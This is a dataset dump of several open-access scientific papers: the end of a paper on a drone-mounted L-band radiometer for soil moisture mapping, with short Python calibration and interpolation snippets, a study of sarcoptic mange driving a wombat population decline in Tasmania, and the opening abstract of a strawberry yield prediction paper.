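def fit_gain_offset(v_hot, v_cold, T_hot, T_cold, T_ref):
    """Solve v = a*(T_ref - T_A) + b from hot/cold load measurements."""
    a = (v_hot - v_cold) / (T_cold - T_hot)
    b = v_hot - a * (T_ref - T_hot)
    return a, b

# Pre- (b) and post-flight (f) calibrations; all numbers illustrative.
a_b, b_b = fit_gain_offset(0.20, 1.10, 300.0, 6.0, T_ref=315.0)
a_f, b_f = fit_gain_offset(0.21, 1.12, 300.0, 6.0, T_ref=315.0)
t_b, t_f = 0.0, 1200.0                     # calibration epochs [s]

def antenna_temperature(v, t, T_ref=315.0):
    """Invert the Dicke relation with linearly drifting a(t) and b(t)."""
    w = (t - t_b) / (t_f - t_b)
    a = a_b + (a_f - a_b) * w
    b = b_b + (b_f - b_b) * w
    return T_ref - (v - b) / a

print(antenna_temperature(v=0.65, t=600.0))   # mid-flight sample
```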
Data Merging and Spatial Interpolation
Once the flight trajectory has been determined, the ground projection is performed and the footprint size and shape are determined. Then, the radiometric data have to be properly processed in order to obtain a geocoded SM map that can be linked to a KML file, to be finally overlaid on Google Earth maps. As described before, the data sampling rate is $f_s$ = 50 Hz, and the UAV speed is 40 m/s. This means that the aircraft has moved 0.8 m between consecutive samples. If an average footprint of 100 m is considered, the pixels have a high level of overlap, and thus the data must be properly interpolated.
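The degree of overlap follows directly from these figures (illustrative arithmetic only):

```python
f_s = 50.0          # sampling rate [Hz]
v = 40.0            # UAV ground speed [m/s]
footprint = 100.0   # average footprint diameter [m]

spacing = v / f_s                   # 0.8 m between consecutive samples
looks = footprint / spacing         # ~125 samples overlap any given spot
print(spacing, looks)
```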
For geo-statistical applications, the Kriging method [13] provides the optimal interpolator. It assigns weights according to a data-driven weighting function (spatial covariance values obtained through a semivariogram). However, for simplicity and computational speed, the algorithm implements an alternative method that assigns a weight to each footprint according to the modified two-dimensional (bivariate) Gaussian density function (GDF) that best fits the antenna pattern main lobe. Each GDF has been adjusted to ensure that on the 3 dB antenna footprint contour, the GDF value falls to half of the maximum (−3 dB in antenna terms).
Finally, the resulting pixel is the product of merging all values from the footprints that intersect a given pixel. Every temperature value of the pixel is obtained from a weighted average of the different looks:
$$\hat{Z}_i = \frac{\sum_{k=1}^{n} GDF_k(d_k)\,Z_k}{\sum_{k=1}^{n} GDF_k(d_k)},$$
where $Z_k$ is the value of the $k$-th contributing antenna footprint, $\hat{Z}_i$ is the estimated value for the $i$-th pixel, $d_k$ is the distance from the center of the pixel to the center of the $k$-th contributing antenna footprint, $GDF_k$ is the GDF of the $k$-th contributing antenna footprint, and $n$ is the total number of contributing footprints.
With this procedure, the footprints generated at lower altitudes have a higher influence on the obtained pixel. In addition, to ensure nadir-looking observations, only footprints with incidence angles less than or equal to 10° are used in the process. This is further explained in the following section.
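The weighting scheme can be sketched as follows; this illustrative Python function (our assumption of the implementation details, using isotropic Gaussian weights for simplicity) merges overlapping footprint values into one pixel estimate:

```python
import numpy as np

def merge_pixel(values, distances, sigmas):
    """Weighted average of overlapping footprint values.

    values    -- antenna temperature (or SM) of each contributing footprint
    distances -- distance from pixel center to each footprint center [m]
    sigmas    -- Gaussian width fitted to each footprint's -3 dB contour [m]
    """
    values = np.asarray(values, dtype=float)
    d = np.asarray(distances, dtype=float)
    s = np.asarray(sigmas, dtype=float)
    w = np.exp(-0.5 * (d / s) ** 2)      # bivariate GDF, isotropic case
    return np.sum(w * values) / np.sum(w)

# Three footprints seen from different altitudes (smaller sigma = lower pass)
print(merge_pixel([240.0, 245.0, 238.0], [5.0, 20.0, 40.0], [15.0, 40.0, 60.0]))
```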
Soil Moisture Retrieval
The brightness temperature of the surface is measured by an antenna at some distance. In this case, the apparent temperature, $T_{AP}$, is the key parameter; it depends on the brightness temperature of the surface under observation ($T_B$), the atmospheric upward radiation ($T_{UP}$), the atmospheric downward radiation scattered and reflected by the surface ($T_{SC}$), and the atmospheric attenuation ($L_a$). The downward radiation is mainly generated by the cosmic background radiation of the sky, $T_{sky}$ ≈ 2.7 K at L-band, and the downwelling atmospheric contribution, $T_{DN,atm}$ ≈ 2.1 K at zenith. These values are fairly constant, will not affect the quality of the measurement, and are thus usually ignored. Since $T_{UP}$ ≈ 0 at low altitudes, $T_{SC}$ is much smaller than the required accuracy, and $L_a$ ≈ 1 (for θ = 0°), at low altitudes the apparent temperature $T_{AP}$ at L-band can be approximated by the brightness temperature emitted by the surface ($T_B$), weighted by the antenna pattern:
$$T_A = \frac{1}{\Omega_p}\iint_{4\pi} T_{AP}(\theta,\phi)\,\left|F_n(\theta,\phi)\right|^2\,d\Omega,$$
where $F_n(\theta,\phi)$ is the normalized antenna voltage pattern, $\Omega_p$ is the equivalent antenna beam solid angle, and $\theta$ is the incidence angle.
The brightness temperature $T_B$ of a soil covered by vegetation is usually estimated as the contribution of three terms: (i) the radiation from the soil, attenuated by the overlying vegetation; (ii) the upward radiation from the vegetation; and (iii) the downward radiation from the vegetation, reflected by the soil and attenuated by the canopy [12]:
$$T_B = (1-\Gamma)\,T_{soil}\,\frac{1}{L_{veg}} + (1-\omega)\left(1-\frac{1}{L_{veg}}\right)T_{veg}\left(1+\frac{\Gamma}{L_{veg}}\right),$$
where $\Gamma$ is the reflection coefficient, $T_{veg}$ and $T_{soil}$ are the physical temperatures of the vegetation and soil, $L_{veg} = \exp(\tau\sec\theta)$ is the attenuation due to the vegetation cover, $\tau = b \times VWC$ [Np] is the optical thickness, $b$ [m²/kg] is a vegetation-dependent factor [14], $VWC$ is the vegetation water content [kg/m²], and $\omega$ is the single scattering albedo. This formulation is known as the τ-ω model [14] and is based on the single scattering approach proposed in [15].
In the case of bare soil, $\tau = 0$, $L_{veg} \approx 1$, and $\omega = 0$, and (7) reduces to
$$T_B = (1-\Gamma)\,T_{soil} = e\,T_{soil},$$
where $e$ is the bare soil emissivity and the reflection coefficient at the air–ground interface, $\Gamma$, is computed using the Wang model [16], in which the smooth-surface (Fresnel) reflectivity is corrected by the mixing polarization parameter $Q_s$ and the surface roughness parameter $h_s$, both functions of the frequency. Recent studies have shown that $h_s$ also depends on soil moisture [17]. In order to retrieve soil moisture from the antenna temperature at a single direction, some assumptions are made:
• The soil is bare and smooth (surface roughness parameter $h_s$ = 0).
• Only incidence angles smaller than 10° are retained, since the angular dependence of $T_B$ around 0° is weak.
To determine the impact of the incidence angle, the emissivity of a bare, flat soil is plotted versus soil moisture for three different incidence angles (θ = 0°, 10°, and 30°; Figure 7a). It can be seen that for incidence angles of up to 10°, the error is smaller than 1% compared with 0° incidence. For incidence angles up to 30°, the error rises to 6%. In Figure 7b, the impact of vegetation cover is illustrated, showing the emissivity of soil versus SM for two different kinds of soil: bare soil and wheat. Compared with bare soil, the error is 6% for 22 cm high vegetation and 15% for 60 cm vegetation. These values are obtained for an incidence angle of θ = 0°.
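The weak angular dependence near nadir can be illustrated with the Fresnel equations for a smooth half-space; the snippet below (our illustration, with an assumed wet-soil permittivity rather than the paper's dielectric model) compares horizontal-polarization emissivity at 0° and 10°:

```python
import numpy as np

def emissivity_h(theta_deg, eps_r):
    """H-pol emissivity of a smooth dielectric half-space (Fresnel)."""
    th = np.radians(theta_deg)
    root = np.sqrt(eps_r - np.sin(th) ** 2)
    gamma_h = np.abs((np.cos(th) - root) / (np.cos(th) + root)) ** 2
    return 1.0 - gamma_h

eps_wet_soil = 15.0 - 3.0j        # assumed relative permittivity of wet soil
e0 = emissivity_h(0.0, eps_wet_soil)
e10 = emissivity_h(10.0, eps_wet_soil)
print(e0, e10, abs(e0 - e10))     # difference well below 0.01
```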
In order to speed up the retrieval process, an emissivity look-up table has been created with SM entries. The scattered radiation is also included for average soil moisture conditions [12]. Then, for a given $T_{ph}$ and $T_A$, the SM is readily estimated.
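A minimal sketch of such a look-up-table inversion, assuming a placeholder monotonic emissivity-versus-SM curve (the paper uses its full forward model to populate the table):

```python
import numpy as np

# Placeholder forward model: emissivity decreases with soil moisture.
sm_grid = np.linspace(0.02, 0.50, 200)       # volumetric SM [m3/m3]
emis_grid = 0.95 - 0.8 * sm_grid             # assumed toy relation

def retrieve_sm(T_A, T_ph):
    """Estimate SM from antenna and physical temperature via the LUT."""
    e_obs = T_A / T_ph                        # observed emissivity
    # emissivity decreases with SM, so flip the grids for np.interp
    return np.interp(e_obs, emis_grid[::-1], sm_grid[::-1])

print(retrieve_sm(T_A=250.0, T_ph=295.0))    # -> ~0.128 for e ~ 0.847
```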
Experimental Results
Three experimental field campaigns have been conducted over different scenarios to retrieve soil moisture maps. The selected scenarios were: (1) the Ripollet site surroundings (Barcelona, Spain), used for agricultural applications (land and crop monitoring with different irrigation levels); (2) the Ebro River mouth (Deltebre, Spain), not presented in this work, used for agricultural (rice fields) and coastal applications [18]; and (3) the REMEDHUS site (Salamanca, Spain), used for SMOS calibration and validation (CAL/VAL) activities [19].
Soil Moisture Measurements at Ripollet Site Surroundings
The Ripollet site surroundings were chosen because the region has a radio-control model flying club near agricultural fields. These fields showed interesting changes in soil moisture during the first half of 2009 due to the different irrigation levels during winter and spring. A measured soil moisture map of the Ripollet field is displayed in Figure 8a. The flight corresponds to April 29 (day of year (DoY) = 119), 2009. In situ ground truth measurements were taken with an ECH2O EC-5 moisture sensor [20] at a vertical depth of 5 cm; at each location, two samples were averaged. The positions of the soil moisture measurements were geo-coded using a commercial GPS receiver. The soil moisture ground truth (SM-GT) map was spatially interpolated at the same pixel resolution as the retrieved SM map and is shown in Figure 8b. Figure 9 shows an error map of the soil moisture retrieved with ARIEL versus the ground truth measurements. In the upper left part of the error image, the absolute value varies from 6% to 9%; in this zone there is a hill with a 10% slope covered by dense wheat fields. In the center of the image, the error is about 1%. There are two noticeable regions (shown in red) where the error reaches up to 16%: one corresponds to the aircraft runway, made of concrete, and the other is covered by tall vegetation (3 m high cane).
Figure 9. Retrieved soil moisture error map with ARIEL compared to ground truth measurements. In the center of the image, the absolute error is about 1% and rises up to 9% in the upper left (data cursor value 8.27%). Two noticeable zones (red and yellow), where the error reaches up to 16%, are the runway and a tall vegetation area (3 m high cane).
Soil Moisture Retrieval Tests at the REMEDHUS SMOS CAL/VAL Site, Zamora, Spain
GRAJO (GPS and Radiometric Joint Observations) is a joint initiative between UPC and the Centro Hispano Luso de Investigaciones Agrarias (CIALE)/Universidad de Salamanca (USAL). The CIALE group is in charge of the in situ measurements, using TDR and Hydra Probe automatic sensors [21] to obtain, simultaneously, soil moisture and temperature at 5, 25, and 50 cm depths. UPC is in charge of the radiometric and GPS-reflectometer data acquisitions.
The GRAJO field campaigns in support of SMOS calibration and validation were carried out in Vadillo de la Guareña, Zamora, Spain, from November 2008 until May 2010 [19].
The objectives of GRAJO are threefold:
• To validate and calibrate the SMOS-derived soil moisture map at SMOS pixel-size levels.
• To study the variability of soil moisture within the SMOS footprint.
• To test pixel disaggregation techniques developed to improve the spatial resolution of SMOS observations.
These algorithms have been tested using airborne radiometric measurements over REMEDHUS acquired with the ARIEL radiometer.
The experiment with ARIEL at the REMEDHUS test site was planned over this very heterogeneous area, where the measured SM varies from 2% to 50% within a 2 km² area. These conditions made it possible to validate the SM retrieval algorithm over different kinds of terrain and SM values. The method's feasibility could be tested thanks to a ground-truth SM map provided by CIALE.
Figure 10 shows a land use map of the area, where four kinds of land use can be distinguished: cereal, vineyard, human-made buildings, and rangeland. There are also rural tracks, trees, and a creek. This kind of land use implies a high degree of SM variability with abrupt changes. Flight measurements were carried out in the morning right after sunrise and in the evening right before sunset in order to reduce the effect of Sun interference (due to reflections over the terrain). The retrieved soil moisture maps from the two flights are plotted in Figure 11a. Figure 11b shows the soil moisture ground truth map obtained by the CIALE/USAL team, generated using Kriging interpolation techniques. The ground truth maps show variations in SM from 2% to almost 50%. Since the experiment was carried out in a very heterogeneous area, the most homogeneous zones, with lower SM variation (up to 15%), are analyzed first. Figure 12a shows the error map between the SM map retrieved from flight 1 (Figure 11a) and the ground truth measurements (Figure 11b) for part of the scenario (center of Figure 11a). The ground truth showed SM variations from 25% to 40%, and the obtained error map (difference between retrieved SM and ground truth, in %) ranges from 1% to 6%. Similar results are obtained in other parts of the scenario. Figure 12b shows the error map of the left part of the scenario with information retrieved from the second flight; the same results are obtained in this flight. Figure 13a shows the error map for the complete image. The absolute error increases at the corners of the area, from 12% up to 20%, due to the substantial reduction in the number of overpasses. It must be pointed out that some areas showed SM variations from 4% to 46% at distances closer than 70 m. These areas are smoothed by the radiometer when a 100 m footprint is observed, which implies a large error in the retrieved SM value.
Figure 13b represents the error map for the complete image from the second flight. There are two zones in the center of the image where the error reaches 20%, for which some considerations must be taken into account. The flight was performed in the afternoon, while the ground truth map was taken in the morning, simultaneously with the first flight, so that in this zone the SM variability is higher due to drying. One limitation of generating ground truth maps with interpolation methods is the variability of SM values over short distances. Another source of error in the ground truth information is the accuracy of the sensor, which in this case is 1.5% [21]. To better understand these large differences, biophysical parameters of the vegetation present at the site are provided in Table 1. The VWC was determined during the measurement, and the normalized difference vegetation index (NDVI) was measured with a USB4000 miniature fiber-optic spectrometer from Ocean Optics. Based on the information in Table 1 and on the land use map of Figure 10, the best results in the first flight were obtained over unproductive areas (bare soil or poor vegetation). Average errors were obtained over grass or pasture zones, where higher vegetation indices were present.
The largest errors are obtained in the vineyard area. Despite its low vegetation index and low water content, this area has a particular orography, with a 10% slope and a road (without ground truth information) that separates a very dense grass zone from the vineyard. Furthermore, this part of the scenario was not well covered during the flight; thus, few footprints contributed to the pixels.
In the second flight, the biggest errors are present over cereal zones, where a high vegetation index is present. The same behavior occurs over the roads, where it is not possible to obtain ground truth information.
Another noticeable artifact in the image of Figure 11a is an apparent circular feature in the retrieved SM maps. It occurs in zones where few overpasses were performed, which means that few samples contribute to the pixel generation, so the shape of the antenna footprint becomes visible.
Conclusions
This work has presented the design and development of ARIEL, an airborne light-weight L-band radiometer. It has also presented the software processor, which includes different calibration, interpolation, and merging techniques. These techniques allow immediate processing of the data right at the end of the flight.
The flexibility of the UAV system has been applied to soil moisture mapping in cereal and vineyard fields located at the REMEDHUS SMOS CAL/VAL site. Results show that geo-referenced Google Earth maps of soil moisture and brightness temperature were obtained with estimated absolute errors between 1% and 6%. These results were obtained in homogeneous zones of agricultural fields.
The experimental tests in heterogeneous and vegetation-covered soils show large errors where abrupt changes in SM are present and Kriging interpolation is prone to larger errors. The best results are obtained over more homogeneous zones, and the best image quality is achieved over the zones in which more overflights were performed. Some improvements to the system are planned in order to increase the resolution. Also, a single GPS-IMU unit will be included to avoid data resampling.
Figure 1. The UAV during a test flight. The ARIEL antenna is located below the fuselage.
Figure 2. (a) Setup for the antenna pattern measurement, showing the antenna mounted on the UAV in the anechoic chamber of the Dept. of Signal Theory and Communications, Universitat Politècnica de Catalunya [9]. (b) Measured full radiation pattern. (c) Simulated and measured copolar radiation pattern in the E-plane. The simulation only considered ideal isotropic radiating elements, and thus slight differences between simulated and measured results can be distinguished. (d) Measured cross-polar radiation pattern for the E-plane.
Figure 4. ARIEL RF front end (100 × 60 × 20 mm) compared to the size of a 1 euro coin.
Figure 5. Data processing. (a) Calibration of the radiometer output (selection of calibration intervals). (b) Synchronization of the altitude data from the GPS and the barometric information.
Figure 6. Images showing the kind of target present in the scene; test performed in a coastal zone. (a) Histogram plot in which different targets and other signals can be distinguished during the measurement: soil, water, calibration, and sun glints. (b) Trajectory plot of the flight superimposed with brightness temperatures.
Figure 10. Land use map for the experiment in Vadillo de la Guareña (Zamora, Spain).
Figure 12. Error maps for the homogeneous zone, retrieved SM versus ground truth measurements: (a) flight 1, (b) flight 2.
Figure 13. Error maps for the full area, retrieved SM versus ground truth measurements: (a) flight 1, (b) flight 2. The dark blue points show the locations of the ground truth measurements.
Table 1. Biophysical parameters of the vegetation present in Vadillo de la Guareña (Zamora, Spain), March 25 (DoY = 84), 2009. | 2014-10-01T00:00:00.000Z | 2010-06-29T00:00:00.000 | {
"year": 2010,
"sha1": "a3408d2ec113c88aba76b4f70657c22aee47891e",
"oa_license": "CCBY",
"oa_url": "https://www.mdpi.com/2072-4292/2/7/1662/pdf?version=1403129183",
"oa_status": "GOLD",
"pdf_src": "ScienceParseMerged",
"pdf_hash": "a3408d2ec113c88aba76b4f70657c22aee47891e",
"s2fieldsofstudy": [
"Agricultural and Food Sciences",
"Engineering",
"Environmental Science"
],
"extfieldsofstudy": [
"Geology",
"Computer Science"
]
} |
261065396 | pes2o/s2orc | v3-fos-license | Density independent decline from an environmentally transmitted parasite
Invasive environmentally transmitted parasites have the potential to cause declines in host populations independent of host density, but this is rarely characterized in naturally occurring populations. We investigated (1) epidemiological features of a declining bare-nosed wombat (Vombatus ursinus) population in central Tasmania owing to a sarcoptic mange (agent Sarcoptes scabiei) outbreak, and (2) reviewed all longitudinal wombat–mange studies to improve our understanding of when host population declines may occur. Over a 7-year period, the wombat population declined 80% (95% CI 77–86%) and experienced a 55% range contraction. The average apparent prevalence of mange was high, at 27% (95% CI 21–34), and increased slightly over our study period, while the population decline continued unabated, independent of declining host abundance. Combined with other longitudinal studies, our research indicated wombat populations may be at risk of decline when apparent prevalence exceeds 25%. This empirical study supports the capacity of environmentally transmitted parasites to cause density-independent host population declines and suggests prevalence limits may be an indicator of impending decline-causing epizootics in bare-nosed wombats. This research is the first to test the effects of density in mange epizootics where transmission is environmental, and it may provide a guide for when apparent prevalence indicates a local conservation threat.
Introduction
Invasive pathogens cause substantive impacts on wildlife populations and can have long-term consequences for population trajectories [1]. Theory often suggests host density plays an important role in disease outbreaks and population declines (density dependence), particularly for directly transmitted pathogens [2]. Hence, as a host population declines, pathogen prevalence may also gradually decline in accordance with diminished host contacts and the pathogen-specific time between infection and mortality. However, theory also suggests declines may occur independent of density where pathogen transmission is environmental [3–5], that is, arising from free-living pathogen stages able to persist for lengths of time independent of the host and cause infection on host contact with fomites [6]. Hence, as host density declines, host encounter rates with fomites may remain unaffected, meaning the prevalence of disease remains high and a disease outbreak continues unabated [5]. In extreme cases, near or complete extirpation of host populations can result from environmental transmission [7]. However, empirical examinations of density independence of environmentally transmitted pathogens are rare in naturally occurring populations.
Among the most invasive and impactful of mammalian parasites is the astigmatid mite Sarcoptes scabiei, which causes sarcoptic mange (termed scabies in humans) [1,8]. The parasite was dispersed in association with European colonialism and now forms a globally invasive panzootic (documented to infect at least 148 mammal species) [8]. Depending on the host species, S. scabiei has emerged or is emerging, with transmission spanning direct to environmental modes [9]. Where S. scabiei has emerged and become established, post-invasion epidemiological dynamics are variable, including endemic disease and outbreaks that cause local declines and extirpations [10,11]. Host density is often proposed as causally associated with S. scabiei-induced population declines [10,12–15]. However, given the variable transmission modes, declines may also occur independent of host density where transmission is dominated by environmental fomites. Density-independent dynamics of environmentally transmitted S. scabiei are yet to be assessed for any host species.
Bare-nosed wombats (Vombatus ursinus) typify the complex post-invasion dynamics of a virulent pathogen. Bare-nosed wombats are large fossorial marsupial herbivores that are non-territorial, live largely solitary lives (meaning direct contacts are rare outside of mating), and share burrows asynchronously owing to burrow switching every 1–9 days [16,17]. Sarcoptes scabiei was introduced to Australia by Europeans and their domestic animals (likely multiple times since the late 1700s), with records of infection in wombats dating back over a century [18,19]. Sarcoptic mange is the most important disease affecting bare-nosed wombats, killing individuals it infects [20,21]. Exposure to S. scabiei occurs in burrows [22], with environmental transmission driven by burrow-switching behaviours [17], which theory suggests may or may not be linked with local density (based on above-ground population counts [10]). Evidence suggests bare-nosed wombat populations predominantly sustain S. scabiei independent of other mammals [7]; populations often persist in the presence of mange and can also become disease free [10,23]. However, outbreaks driving gradual declines also occur [7], and the epidemiological features associated with declines are rarely understood.
We describe a wombat population declining owing to sarcoptic mange and evaluate evidence of density independence and range contraction. We then compile and contrast all published longitudinal wombat population studies in which mange disease is reported, and examine whether limits exist between mange prevalence and wombat population trajectories. Collectively, we characterize the epidemiological features associated with variable post-invasion host–pathogen dynamics of an environmentally transmitted parasite.
Material and methods
(a) Study site and surveys
This research was undertaken on private property in the central Tasmanian highlands (average elevation 650 m a.s.l.). The site is characterized by highland Poa grassland, partially modified by stock grazing, surrounded by Eucalyptus dalrympleana, E. pauciflora and E. delegatensis dry forest and woodland [24]. Following the detection of wombats showing signs of mange disease in 2014, surveys commenced in 2015 and were conducted through to 2022, with a gap in surveys between 2018 and 2020. The occurrence of mange disease at the site prior to 2014 is unreported, suggesting it was either absent or at low prevalence.
We undertook 29 survey trips, most lasting 2–3 survey days, to record counts of wombats and wombats with mange within our study area. Three surveys lasted 1 day and one lasted 4 days. On each occasion, surveys of wombats and their signs of mange were undertaken by observation using established methods [7,25]. Briefly, surveys were conducted from late afternoon to dusk, walking a 4.4 km transect. Each observed wombat was assessed for clinical signs of mange (characteristic patterns of alopecia and hyperkeratosis [25]) using 10 × 42 magnification binoculars. For each observation, the location of the wombat and its mange status was recorded. In instances where the wombat fled or disappeared down a burrow before a mange assessment could be made, its location was recorded, but its mange status was listed as unknown. Survey frequency varied across the 8-year study period, being most frequent in 2016 and 2020–2022, and surveys can be broadly grouped into two defined time periods: 2015–2018 and 2020–2022.
In addition to dusk surveys, to ensure robust confirmation of population decline, we made efforts to survey wombats during the day (cooler temperatures at the site's elevation mean wombats are often out during the day) and at night by spotlight. As these additional surveys did not impact study findings and there was no perceivable overlap in counted individuals, all surveys on a given day were combined. We stress that wombat counts are necessarily an index of true population size, and counts have been shown to correlate among survey methods, suggesting they are representative [26].
We explicitly use the term 'apparent prevalence' to describe the relative proportion of the wombat population showing signs of sarcoptic mange. Diagnosis of S. scabiei infection is based on visual signs of disease (mainly alopecia and hyperkeratosis) that have been verified against other clinical diagnostic techniques [27]. Visual diagnosis of early-stage S. scabiei infection is inherently variable, so estimates of mange prevalence are likely conservative in most instances [27].
Finally, we compiled all studies reporting longitudinal surveys of wombats in which mange disease was also reported, and extracted study location, duration, number of wombats observed, and apparent prevalence of mange. This evaluation of the literature was undertaken to assess whether there was any relationship between apparent prevalence and wombat population trajectories.
(b) Statistical analyses
All analyses were undertaken in R v. 4.0.3 using the 'stats', 'rio', 'lubridate', 'stats4', 'arm', 'lme4', 'adehabitatHR', 'rgdal' and 'sp' packages. Wombat data were expressed as wombats observed per survey day to account for minor variation in the number of surveys on a given day and because the same 4.4 km transect was repeated. A generalized linear mixed model (GLMM) was used to evaluate changes in wombat abundance (our response variable), with time period (2015–2018 versus 2020–2022) and apparent prevalence of mange as predictor variables, and survey trip as a random effect. We excluded date from this analysis as it was confounded with time period, and the analytical outcomes were consistent. We additionally investigated whether the probability of a wombat being assigned as mange positive changed between the time periods, using a GLMM with a binomial error distribution and survey trip as the random effect. For readers who prefer to see prevalence as the response variable, we also provide data and analyses in this representation (electronic supplementary material, S1). Finally, we investigated whether the distribution of wombats shifted between the two time periods by calculating and comparing the 100% minimum convex polygon (MCP) around wombat observation points in 2015–2018 versus 2020–2022. In preliminary analyses we considered a range of MCP sizes (100%, 90%, 80%, 70%), finding that the same general conclusion was reached regardless (electronic supplementary material, S2).
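The models were fitted in R with lme4; an approximate Python analogue of the Gaussian mixed model, using statsmodels with hypothetical column and file names (our sketch, not the authors' code), would look like this:

```python
import pandas as pd
import statsmodels.formula.api as smf

# Hypothetical data frame: one row per survey day, with columns
# 'wombats' (count per survey day), 'period' ("2015-2018"/"2020-2022"),
# 'prevalence' (apparent mange prevalence) and 'trip' (survey trip id).
df = pd.read_csv("wombat_surveys.csv")   # assumed file name

# Gaussian mixed model: abundance ~ period + prevalence, with a
# random intercept per survey trip (analogue of the paper's GLMM).
model = smf.mixedlm("wombats ~ period + prevalence", df, groups=df["trip"])
result = model.fit()
print(result.summary())
```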
Results
The decline in the average number of wombats per survey was associated with time period (2015–2018 versus 2020–2022) and was unrelated to the apparent prevalence of mange (figure 1; Gaussian GLMM: time period F = 9.83, p = 0.004; prevalence F = 2.41, p = 0.122). Notably, the probability of a wombat being assigned as sarcoptic mange positive did not decline as the number of wombats per survey fell between the time periods, but rather increased (binomial GLMM: time period z = 2.16, p = 0.031). The distribution of wombats in the study area also contracted between the two study periods (figure 2). Proportional range contraction was estimated at 54.9%, based on a reduction in the 100% MCP from 7.4 km² in 2015–2018 to 4.5 km² in 2020–2022. Range contraction was supported regardless of MCP size (electronic supplementary material, S2).
(b) Longitudinal studies of wombat population trajectories in relation to mange
Including the present study, we identified nine published longitudinal studies documenting wombat population trajectories in which mange disease was also documented: six from Tasmania and three from New South Wales (table 1). Study durations ranged from 2 to 9 years, and counts of wombats ranged from 79 to 1342. Of the nine studies, two documented mange outbreaks driving declining wombat populations, with average apparent prevalence estimates of 27.7% and 33.9%. By contrast, the average apparent prevalence of sarcoptic mange among the remaining studies was 10.1% (range 0.0–24.9%). Some inter-surveyor differences may exist in the diagnosis of mange across studies, particularly between the NSW and Tasmanian studies. Nevertheless, the general pattern among this limited study set was for population declines to be observed when mange prevalence was greater than 25%, and stable populations when it was less than 25%. This interpretation may indicate that the population at the NSW Wolgan Valley site is at risk of decline (apparent prevalence 24.9%).
Discussion
Invasive environmentally transmitted parasites have potential to cause declines in host populations independent of host density, but the empirical features associated with variable host and pathogen dynamics are rarely studied in naturally occurring populations.Here, we investigated the epidemiological features of a declining wombat population owing to a sarcoptic mange outbreak, and contrasted longitudinal wombat-mange studies to help understand when host population declines are likely to occur.The study population declined by an average of 80% between 2015-2018 and 2020-2022, exhibiting a high (27%) and slightly increasing apparent prevalence of mange.The population decline was characterized by a 55% range reduction within the study area.Combined with other longitudinal studies, our research suggests wombat populations may be at risk of decline when the apparent prevalence exceeds 25%.This empirical study supports the capacity of environmentally transmitted parasites to cause density independent declines in host populations and suggests prevalence limits may be a useful indicator of impending epizootics.This study represents the third formally documented decline of bare-nosed wombats owing to sarcoptic mange outbreaks.The first S. scabiei-driven decline for any host species was by Gray [29], who discussed the severe decline of bare-nosed wombats over a 5-year period in southern NSW.Although no empirical data were presented, descriptions suggest the decline was likely greater than 80%.More recently a detailed empirical description of S. scabiei causing a 94% decline of wombats in northern Tasmania was made by Martin et al. [7].Like the present study, a host range reduction was also documented [7], and very low numbers of wombats continue to occur there [23].Host population declines associated with S. scabiei are widespread in affected mammals, such as red-fox [30][31][32], kit fox [33], vicuña [34,35], ibex [36,37], chamois [38], grey wolf [11] and coyote [15].Importantly, this research is the first to test for the effect of density in mange epizootics where transmission is principally environmental [9].
A general feature of S. scabiei outbreaks across host species is the extended timeframe over which epizootics take place.Mange outbreaks typically take years to spread through host populations [8], in contrast with many other important wildlife pathogens causing host declines (e.g.[39][40][41]), although not all (e.g.[42]).Whether a host population experiences a decline owing to S. scabiei may be governed by a range of factors, and indeed factors shaping transmission of S. scabiei vary across host species [9].A recent study by Beeton et al. [10] suggested epidemiological outcomes of S. scabiei in bare-nosed wombat populations could be determined by host density, environmental survival of the parasite, host shedding of S. scabiei into burrows, and the rate at which wombats switch burrows.Our research suggests that once an outbreak is initiated, the abundance of bare-nosed wombats (measured as counts of individuals above ground) plays little role in modifying outbreak progression, pathogen prevalence or host decline.Similarly Martin et al. [7] also showed an outbreak in wombats continued unabated, regardless of host abundance.These findings Absolute host abundance/density may not be the most critical factor, and a relative metric such as the ratio of burrows per wombat may be more useful, as this could dictate the extent of shared space use and probability of environmental exposure [17].Given wombats have relatively small and fixed home ranges, the combination of burrow switching, ratio of burrows per wombat, and home range stability may explain why declines continue when host densities are low, and reciprocally, why the apparent prevalence of manage can remain stable in some populations over time [23,43].
A potentially valuable outcome of this study is the relationship between apparent prevalence of mange and whether a wombat population remains stable or declines. While the apparent prevalence threshold of 25% we identified is necessarily tentative because of the relatively small number of studies available, it provides a conservative reference point at which other studies might flag potential local conservation concerns. It is also important to acknowledge that apparent prevalence is a conservative estimate of true S. scabiei prevalence in wombat populations [27]. Under-diagnosis rates are poorly understood, particularly at early stages of infection, and some research suggests 'true' prevalence estimates could be 25% higher than apparent prevalence during epizootics [27]. Similarly, population-level prevalence estimates may vary among observers, owing to differences in expertise in diagnosing clinical signs. This warrants some caution in interpreting the relationship between mange prevalence and host decline. However, the Tasmanian studies used consistently trained researchers, giving some confidence that the 25% value may be reasonable.
Figure 1. Declining wombats per survey day over time (a) and by time period (b); increasing apparent prevalence of sarcoptic mange over time (c) and by time period (d); and the density-independent relationship between wombats per survey day and the apparent prevalence of sarcoptic mange (e). Positions of points are jittered in (b) and (d) for visual clarity.
Table 1. Longitudinal studies of wombat populations documenting apparent prevalence of sarcoptic mange and population trajectories. TAS = Tasmania, NSW = New South Wales, NP = National Park.
"year": 2023,
"sha1": "9442806d61e0e54218af2508042c90322a94c2dc",
"oa_license": "CCBY",
"oa_url": null,
"oa_status": "CLOSED",
"pdf_src": "PubMedCentral",
"pdf_hash": "09b4b502c3060817cf12c452f0808293a3b26c22",
"s2fieldsofstudy": [
"Environmental Science"
],
"extfieldsofstudy": [
"Medicine"
]
} |
Prediction of strawberry yield based on receptacle detection and Bayesian inference
The strawberry receptacle is a more direct predictor of yield than the flower, as receptacles eventually become fruits. Thus, we tried to predict yield by combining an AI technique for receptacle detection in images with statistical analysis of the relationship between the number of receptacles detected and the strawberry yield over a period of time. Five major cultivars were grown to account for cultivar characteristics, and environmental factors were collected over two years to account for climate differences. A Faster R-CNN-based object detector was used to estimate the number of receptacles per strawberry plant in two-dimensional images, achieving a mAP of 0.6587 on our dataset. However, not all receptacles appear in the two-dimensional images, and Bayesian analysis was used to model the uncertainty associated with the number of receptacles missed by the AI. After estimating the probability of fruiting per receptacle, prediction models for the total strawberry yield at the end of the harvest season were evaluated. Even though the detection accuracy was not perfect, the results indicated that counting receptacles by object detection and estimating the probability of fruiting per receptacle by Bayesian modeling are more useful for predicting the total yield per plant than knowing its cumulative yield during the first month.
Introduction
